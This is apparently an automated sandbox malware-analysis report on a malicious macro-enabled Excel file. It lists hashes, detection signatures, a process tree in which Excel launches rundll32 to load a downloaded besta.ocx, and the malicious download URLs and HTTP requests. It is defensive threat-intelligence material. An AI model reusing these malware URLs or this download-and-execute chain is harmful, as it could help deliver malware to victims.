Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report SCAN_7295943480515097.xlsm

Overview

General Information

Sample Name:SCAN_7295943480515097.xlsm
Analysis ID:532474
MD5:1ab11dce30326f39f6186f9aa05d5777
SHA1:397dd88ca9d78a16ab549a8d22a711ddbea80c05
SHA256:8f8e07b2eaca8af62e86cebd2372f1b85d420091801ec472796387a44a98bbcd
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1348 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • rundll32.exe (PID: 2844 cmdline: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4280415509 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4280415509, CommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4280415509, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1348, ProcessCommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4280415509, ProcessId: 2844

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: SCAN_7295943480515097.xlsmVirustotal: Detection: 21%Perma Link
    Antivirus detection for URL or domainShow sources
    Source: http://standoutglobal.com/2/MWpqeVgZ/SoftwaAvira URL Cloud: Label: malware
    Source: http://standoutglobal.com/2/MWpqeVgZ/1-48FDAvira URL Cloud: Label: malware
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownHTTPS traffic detected: 107.180.46.229:443 -> 192.168.2.22:49169 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 162.240.9.126:80
    Source: global trafficDNS query: name: standoutglobal.com
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 107.180.46.229:443
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vendes.marketingConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /transmigrant/Wplzr/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vendes.marketingConnection: Keep-Alive
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
    Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: src="https://www.facebook.com/tr?id=408176514230511&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
    Source: EXCEL.EXE, 00000000.00000003.537240809.0000000005B21000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.739956925.0000000005B21000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EXCEL.EXE, 00000000.00000002.737179895.00000000050F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.477889247.0000000001F10000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: EXCEL.EXE, 00000000.00000003.537240809.0000000005B21000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.739956925.0000000005B21000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537253356.0000000005B39000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.739967235.0000000005B39000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: EXCEL.EXE, 00000000.00000002.737179895.00000000050F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.477889247.0000000001F10000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
    Source: EXCEL.EXE, 00000000.00000002.737179895.00000000050F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.477889247.0000000001F10000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
    Source: EXCEL.EXE, 00000000.00000002.737396730.00000000052D7000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.478045523.00000000020F7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: EXCEL.EXE, 00000000.00000002.737396730.00000000052D7000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.478045523.00000000020F7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537253356.0000000005B39000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.739967235.0000000005B39000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
    Source: EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
    Source: EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
    Source: EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
    Source: EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
    Source: EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
    Source: EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
    Source: EXCEL.EXE, 00000000.00000002.740262687.0000000007996000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.740096336.0000000006E36000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.740202968.00000000072A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.740233220.00000000078E6000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
    Source: EXCEL.EXE, 00000000.00000002.740202968.00000000072A6000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/drawml/2006/spreadsheetD
    Source: EXCEL.EXE, 00000000.00000002.740096336.0000000006E36000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
    Source: EXCEL.EXE, 00000000.00000002.740262687.0000000007996000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.740233220.00000000078E6000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
    Source: EXCEL.EXE, 00000000.00000002.737396730.00000000052D7000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.478045523.00000000020F7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: EXCEL.EXE, 00000000.00000002.737971130.00000000056CB000.00000004.00000001.sdmpString found in binary or memory: http://standoutglobal.c
    Source: EXCEL.EXE, 00000000.00000002.737971130.00000000056CB000.00000004.00000001.sdmpString found in binary or memory: http://standoutglobal.co
    Source: EXCEL.EXE, 00000000.00000002.737971130.00000000056CB000.00000004.00000001.sdmpString found in binary or memory: http://standoutglobal.com%http://standoutglobal.com/2/MWpqeVgZ/
    Source: EXCEL.EXE, 00000000.00000002.737128548.0000000004ED6000.00000004.00000001.sdmpString found in binary or memory: http://standoutglobal.com/2/MWpqeVgZ/1-48FD
    Source: EXCEL.EXE, 00000000.00000002.737128548.0000000004ED6000.00000004.00000001.sdmpString found in binary or memory: http://standoutglobal.com/2/MWpqeVgZ/Softwa
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: http://vendes.marketing/
    Source: EXCEL.EXE, 00000000.00000002.737128548.0000000004ED6000.00000004.00000001.sdmpString found in binary or memory: http://vendes.marketing/transmigrant/Wplzr/
    Source: EXCEL.EXE, 00000000.00000002.737396730.00000000052D7000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.478045523.00000000020F7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
    Source: EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: EXCEL.EXE, 00000000.00000002.737179895.00000000050F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.477889247.0000000001F10000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: EXCEL.EXE, 00000000.00000002.737396730.00000000052D7000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.478045523.00000000020F7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: EXCEL.EXE, 00000000.00000002.737179895.00000000050F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.477889247.0000000001F10000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000004.00000002.477889247.0000000001F10000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: EXCEL.EXE, 00000000.00000002.735831519.000000000050F000.00000004.00000020.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://api.w.org/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://connect.facebook.net/es_LA/sdk/xfbml.customerchat.js
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Josefin
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Roboto:ital
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
    Source: EXCEL.EXE, 00000000.00000003.537059494.0000000005BB8000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://s.w.org/images/core/emoji/13.1.0/svg/1f609.svg
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://schema.org
    Source: EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537253356.0000000005B39000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.739967235.0000000005B39000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/
    Source: EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpString found in binary or memory: https://vendes.marketing/C:
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital-en-cdmx/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital-en-guadalajara/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital-en-monterrey/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/auditorias-y-optimizacion-de-camp
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/consultoria-en-marketing-basado-e
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/consultoria-para-adsense/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/consultoria-para-youtube/
    Source: EXCEL.EXE, 00000000.00000003.537059494.0000000005BB8000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/digital-partner-incubadora-de-neg
    Source: EXCEL.EXE, 00000000.00000003.537059494.0000000005BB8000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/marketing-para-el-sector-salud/
    Source: EXCEL.EXE, 00000000.00000003.537059494.0000000005BB8000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/marketing-para-inmobiliarias-cons
    Source: EXCEL.EXE, 00000000.00000003.537059494.0000000005BB8000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/marketing-para-startups/
    Source: EXCEL.EXE, 00000000.00000003.537059494.0000000005BB8000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/consultorias/transformacion-de-empresas/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/amazon-seo/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/conversion-rate-optimizati
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/crm/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/emailing/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/google-merchant-center/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/pagos-online/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-magento/
    Source: EXCEL.EXE, 00000000.00000003.537059494.0000000005BB8000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-shopify/
    Source: EXCEL.EXE, 00000000.00000003.537059494.0000000005BB8000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-wordpres
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tiendas-en-facebook-e-inst
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/amazon-seo/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/conversion-rate-optimization/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/crm/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/emailing/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/google-merchant-center/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/pagos-online/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/tienda-online-con-magento/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/tienda-online-con-shopify/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/tienda-online-con-wordpress-woocomme
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/ecommerce/tiendas-en-facebook-e-instagram/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/branding/
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/diseno-editorial/
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/diseno-grafico/
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/diseno-web-ux/
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/fotografia-y-edicion/
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/produccion-audiovisual/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/automatizacion-de-
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/desarrollo-de-apli
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/desarrollo-de-mega
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/desarrollo-de-pagi
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/desarrollo-de-tien
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/creacion-de-con
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/estrategias-en-
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/facebook-ads/
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/google-ads-adwo
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/inbound-marketi
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/inteligencia-de
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/publicidad-digi
    Source: GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/seo-posicionami
    Source: EXCEL.EXE, 00000000.00000003.537059494.0000000005BB8000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/blog/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/comments/feed/
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/feed/
    Source: EXCEL.EXE, 00000000.00000003.537240809.0000000005B21000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.739956925.0000000005B21000.00000004.00000001.sdmpString found in binary or memory: https://vendes.marketing/nY
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.0.2
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.0.2
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor-pro/assets/lib/lottie/lottie.min.js?ver=5.6.6
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.mi
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.4.8
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.4.8
    Source: EXCEL.EXE, 00000000.00000003.537272193.0000000005BB1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537148185.0000000005B9C000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.4.8
    Source: EXCEL.EXE, 00000000.00000003.537272193.0000000005BB1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537148185.0000000005B9C000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.4.8
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.4.8
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3
    Source: EXCEL.EXE, 00000000.00000003.537272193.0000000005BB1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537148185.0000000005B9C000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eico
    Source: besta.ocx.0.dr, GSCXBEVV.htm.0.drString found in binary or memory: https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)
